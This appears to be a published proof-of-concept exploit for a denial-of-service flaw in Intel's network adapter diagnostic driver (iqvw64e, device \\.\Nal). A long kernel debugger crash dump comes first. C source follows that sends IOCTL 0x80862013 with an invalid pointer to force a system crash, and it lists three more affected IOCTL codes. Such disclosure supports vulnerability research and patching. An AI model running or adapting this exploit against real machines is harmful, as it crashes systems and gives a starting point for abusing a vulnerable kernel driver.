nt!RtlpBreakWithStatusInstruction 00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800036c3cb0 rsp=fffff88006539988 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlpBreakWithStatusInstruction: fffff800`036c3cb0 cc int 3 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800037bba62 rsp=fffff88006539990 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiBugCheckDebugBreak+0x12: fffff800`037bba62 eb75 jmp nt!KiBugCheckDebugBreak+0x89 (fffff800`037bbad9) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e 02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e rax=0000000000000000 rbx=0000000000000065 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000 rip=fffff800037bc84e rsp=fffff880065399f0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=000000000000003b r13=0000000000000001 r14=0000000040000082 r15=0000000000000003 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KeBugCheck2+0x71e: fffff800`037bc84e eb11 jmp nt!KeBugCheck2+0x731 (fffff800`037bc861) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cbf84 rsp=fffff8800653a0c0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KeBugCheckEx+0x104: fffff800`036cbf84 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69 04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cb429 rsp=fffff8800653a100 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiBugCheckDispatch+0x69: fffff800`036cb429 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c 05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036cad7c rsp=fffff8800653a240 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiSystemServiceHandler+0x7c: fffff800`036cad7c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd 06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036f6a4d rsp=fffff8800653a280 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlpExecuteHandlerForException+0xd: fffff800`036f6a4d 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415 07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415 rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003 rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000 rip=fffff800036f5825 rsp=fffff8800653a2b0 rbp=0000000000000000 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54 r14=fffff800036cad00 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!RtlDispatchException+0x415: fffff800`036f5825 0fba257fc51d0017 bt dword ptr [nt!NtGlobalFlag (fffff800`038d1dac)],17h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 rax=0000000000000000 rbx=fffff8800653b168 rcx=0000000000000003 rdx=000000000000008a rsi=fffff8800653b210 rdi=00000000deadbeef rip=fffff800037067b1 rsp=fffff8800653a990 rbp=fffff8800653aec0 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=fffff8800653a9c0 r13=000000000010001f r14=fffff8800653b030 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiDispatchException+0x135: fffff800`037067b1 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff800036cb502 rsp=fffff8800653b030 rbp=fffff8800653b290 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiExceptionDispatch+0xc2: fffff800`036cb502 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a 0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003 rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff800036ca07a rsp=fffff8800653b210 rbp=fffff8800653b290 r8=0000000000000065 r9=0000000000000000 r10=0000000000000000 r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiPageFault+0x23a: fffff800`036ca07a 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 iqvw64e+0x3fd2: fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac 0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160 rip=fffff88005a091ac rsp=fffff8800653b8a0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 iqvw64e+0x11ac: fffff880`05a091ac 8bd8 mov ebx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160 rip=fffff800039e80f7 rsp=fffff8800653b8d0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!IopXxxControlFile+0x607: fffff800`039e80f7 448be0 mov r12d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88 rip=fffff800039e8956 rsp=fffff8800653ba00 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!NtDeviceIoControlFile+0x56: fffff800`039e8956 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88 rip=fffff800036cb113 rsp=fffff8800653ba70 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 nt!KiSystemServiceCopyEnd+0x13: fffff800`036cb113 65ff042538220000 inc dword ptr gs:[2238h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034 rip=0000000073b02e09 rsp=000000000021e898 rbp=00000000001dfe68 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64cpu!CpupSyscallStub+0x9: 00000000`73b02e09 c3 ret _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034 rip=0000000073b02944 rsp=000000000021e8a0 rbp=00000000001dfe68 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20 r14=000000000021e910 r15=0000000073b02450 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64cpu!DeviceIoctlFileFault+0x31: 00000000`73b02944 488b4c2420 mov rcx,qword ptr [rsp+20h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa 12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0 rip=0000000073b7d286 rsp=000000000021e960 rbp=000000000021e9d0 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000 r14=0000000000000001 r15=ffffffffffffffff iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64!RunCpuSimulation+0xa: 00000000`73b7d286 eb00 jmp wow64!RunCpuSimulation+0xc (00000000`73b7d288) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a 13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0 rip=0000000073b7c69e rsp=000000000021e9b0 rbp=000000000021e9d0 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000 r14=0000000000000001 r15=ffffffffffffffff iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 wow64!Wow64LdrpInitialize+0x42a: 00000000`73b7c69e cc int 3 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef rdx=0000000080862013 rsi=00000000774e2670 rdi=00000000774b5978 rip=00000000773f4966 rsp=000000000021ef00 rbp=00000000773b0000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=00000000774e2520 r13=0000000000000000 r14=00000000774e2650 r15=000000007efdf000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll!LdrpInitializeProcess+0x17e3: 00000000`773f4966 eb00 jmp ntdll!LdrpInitializeProcess+0x1c12 (00000000`773f4968) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0 15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0 rax=0000f88005a696d1 rbx=000000007efdf000 rcx=00000000deadbeef rdx=0000000080862013 rsi=000000007efdb000 rdi=0000000000000000 rip=00000000773f1937 rsp=000000000021f3f0 rbp=0000000000000000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=000000000021f4b0 r13=00000000773b0000 r14=0000000000000001 r15=000000007740a220 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll! ?? ::FNODOBFM::`string'+0x28ff0: 00000000`773f1937 89442430 mov dword ptr [rsp+30h],eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe 16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe rax=0000f88005a696d1 rbx=000000000021f4b0 rcx=00000000deadbeef rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000000 rip=00000000773dc34e rsp=000000000021f460 rbp=0000000000000000 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286 ntdll!LdrInitializeThunk+0xe: 00000000`773dc34e b201 mov dl,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction 3: kd> dd fffff8800653b8d0 fffff880`0653b8d0 80862013 00000000 0653bb60 fffff880 fffff880`0653b8e0 4d1084d0 fffffa80 4d01e160 fffffa80 fffff880`0653b8f0 746c6644 00000000 0653b928 fffff880 fffff880`0653b900 0653b968 fffff880 00000000 00000000 fffff880`0653b910 00000000 00000000 00000001 00000000 fffff880`0653b920 4c804e01 00000000 4d1084d0 fffffa80 fffff880`0653b930 00000000 00000000 00000000 00000000 fffff880`0653b940 4d01e160 fffffa80 76bdd0af 00000000 3: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS fffffa8048f5f740 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00187000 ObjectTable: fffff8a0000017f0 HandleCount: 535. Image: System . . . PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe . . . 3: kd> !handle fffffa804d0f29e0 7 PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe Handle table at fffff8a016893450 with 13 entries in use Invalid Handle: 0x4d0f29e0 3: kd> !process fffffa804d0f29e0 f PROCESS fffffa804d0f29e0 SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13. Image: ConsoleApplication7.exe VadRoot fffffa804a9eb220 Vads 30 Clone 0 Private 110. Modified 0. Locked 0. DeviceMap fffff8a0022b5570 Token fffff8a01685d060 ElapsedTime 00:00:39.608 UserTime 00:00:00.000 KernelTime 00:00:00.000 QuotaPoolUsage[PagedPool] 20128 QuotaPoolUsage[NonPagedPool] 3360 Working Set Sizes (now,min,max) (510, 50, 345) (2040KB, 200KB, 1380KB) PeakWorkingSetSize 510 VirtualSize 11 Mb PeakVirtualSize 11 Mb PageFaultCount 529 MemoryPriority BACKGROUND BasePriority 8 CommitCharge 140 Job fffffa804d0fc080 THREAD fffffa804c800060 Cid 0d9c.0da0 Teb: 000000007efdb000 Win32Thread: 0000000000000000 RUNNING on processor 3 IRP List: fffffa804d01e160: (0006,0118) Flags: 00060000 Mdl: 00000000 Not impersonating DeviceMap fffff8a0022b5570 Owning Process fffffa804d0f29e0 Image: ConsoleApplication7.exe Attached Process N/A Image: N/A Wait Start TickCount 440956 Ticks: 0 Context Switch Count 31 IdealProcessor: 3 UserTime 00:00:00.000 KernelTime 00:00:00.000 *** WARNING: Unable to verify checksum for ConsoleApplication7.exe *** ERROR: Module load completed but symbols could not be loaded for ConsoleApplication7.exe Win32 Start Address ConsoleApplication7 (0x0000000000041354) Stack Init fffff8800653bc70 Current fffff8800653b530 Base fffff8800653c000 Limit fffff88006536000 Call 0 Priority 11 BasePriority 8 UnusualBoost 0 ForegroundBoost 2 IoPriority 2 PagePriority 5 Child-SP RetAddr Call Site fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2 fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a (TrapFrame @ fffff880`0653b210) fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2 fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607 fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56 fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`0653bae0) 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe 3: kd> !irp fffffa804d01e160 Irp is active with 1 stacks 1 is current (= 0xfffffa804d01e230) No Mdl: No System Buffer: Thread fffffa804c800060: Irp stack trace. cmd flg cl Device File Completion-Context >[ e, 0] 5 0 fffffa804aac7b00 fffffa804d1084d0 00000000-00000000 \FileSystem\iqvw64e Args: 00000000 00000000 80862013 deadbeef 3: kd> !object fffffa804aac7b00 Object: fffffa804aac7b00 Type: (fffffa804900af30) Device ObjectHeader: fffffa804aac7ad0 (new version) HandleCount: 0 PointerCount: 2 Directory Object: fffff8a000010060 Name: Nal 3: kd> dt_IO_STACK_LOCATION 0xfffffa804d01e230 ntdll!_IO_STACK_LOCATION +0x000 MajorFunction : 0xe '' +0x001 MinorFunction : 0 '' +0x002 Flags : 0x5 '' +0x003 Control : 0 '' +0x008 Parameters : <unnamed-tag> +0x028 DeviceObject : 0xfffffa80`4aac7b00 _DEVICE_OBJECT +0x030 FileObject : 0xfffffa80`4d1084d0 _FILE_OBJECT +0x038 CompletionRoutine : (null) +0x040 Context : (null) 3: kd> !devobj 0xfffffa80`4aac7b00 7 Device object (fffffa804aac7b00) is for: Nal \FileSystem\iqvw64e DriverObject fffffa804b0f4d70 Current Irp 00000000 RefCount 1 Type 00008086 Flags 00000044 Dacl fffff9a10008c391 DevExt fffffa804aac7c50 DevObjExt fffffa804aac7c68 ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT Characteristics (0000000000) Device queue is not busy. 3: kd> !drvobj fffffa804b0f4d70 7 Driver object (fffffa804b0f4d70) is for: \FileSystem\iqvw64e Driver Extension List: (id , addr) Device Object list: fffffa804aac7b00 DriverEntry: fffff88005fda200 iqvw64e DriverStartIo: 00000000 DriverUnload: fffff88005a09010 iqvw64e AddDevice: 00000000 Dispatch routines: [00] IRP_MJ_CREATE fffff88005a09090 iqvw64e+0x1090 [01] IRP_MJ_CREATE_NAMED_PIPE fffff800036b0e30 nt!IopInvalidDeviceRequest [02] IRP_MJ_CLOSE fffff88005a090f0 iqvw64e+0x10f0 [03] IRP_MJ_READ fffff800036b0e30 nt!IopInvalidDeviceRequest [04] IRP_MJ_WRITE fffff800036b0e30 nt!IopInvalidDeviceRequest [05] IRP_MJ_QUERY_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [06] IRP_MJ_SET_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [07] IRP_MJ_QUERY_EA fffff800036b0e30 nt!IopInvalidDeviceRequest [08] IRP_MJ_SET_EA fffff800036b0e30 nt!IopInvalidDeviceRequest [09] IRP_MJ_FLUSH_BUFFERS fffff800036b0e30 nt!IopInvalidDeviceRequest [0a] IRP_MJ_QUERY_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [0b] IRP_MJ_SET_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest [0c] IRP_MJ_DIRECTORY_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [0d] IRP_MJ_FILE_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [0e] IRP_MJ_DEVICE_CONTROL fffff88005a09150 iqvw64e+0x1150 [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [10] IRP_MJ_SHUTDOWN fffff800036b0e30 nt!IopInvalidDeviceRequest [11] IRP_MJ_LOCK_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [12] IRP_MJ_CLEANUP fffff800036b0e30 nt!IopInvalidDeviceRequest [13] IRP_MJ_CREATE_MAILSLOT fffff800036b0e30 nt!IopInvalidDeviceRequest [14] IRP_MJ_QUERY_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest [15] IRP_MJ_SET_SECURITY fffff800036b0e30 nt!IopInvalidDeviceRequest [16] IRP_MJ_POWER fffff800036b0e30 nt!IopInvalidDeviceRequest [17] IRP_MJ_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest [18] IRP_MJ_DEVICE_CHANGE fffff800036b0e30 nt!IopInvalidDeviceRequest [19] IRP_MJ_QUERY_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest [1a] IRP_MJ_SET_QUOTA fffff800036b0e30 nt!IopInvalidDeviceRequest [1b] IRP_MJ_PNP fffff800036b0e30 nt!IopInvalidDeviceRequest */ #include <windows.h> #include <stdio.h> #include <conio.h> int main(int argc, char **argv) { HANDLE hDevice; DWORD bret; char szDevice[] = "\\\\.\\Nal"; printf("--[ Intel Network Adapter Diagnostic Driver DoS ]--\n"); printf("Opening handle to driver..\n"); // CreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDispoition, dwFlagsAndAttributes, hTemplateFile) if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) { printf("Device %s succesfully opened!\n", szDevice); printf("\tHandle: %p\n", hDevice); } else { printf("Error: Error opening device %s\n", szDevice); } printf("\nPress any key to DoS.."); _getch(); bret = 0; // Affected IOCTL codes: 0x80862013, 0x8086200B, 0x8086200F, 0x80862007 // DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped) if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL)) { printf("DeviceIoControl Error - bytes returned %#x\n", bret); } CloseHandle(hDevice); return 0; } Source

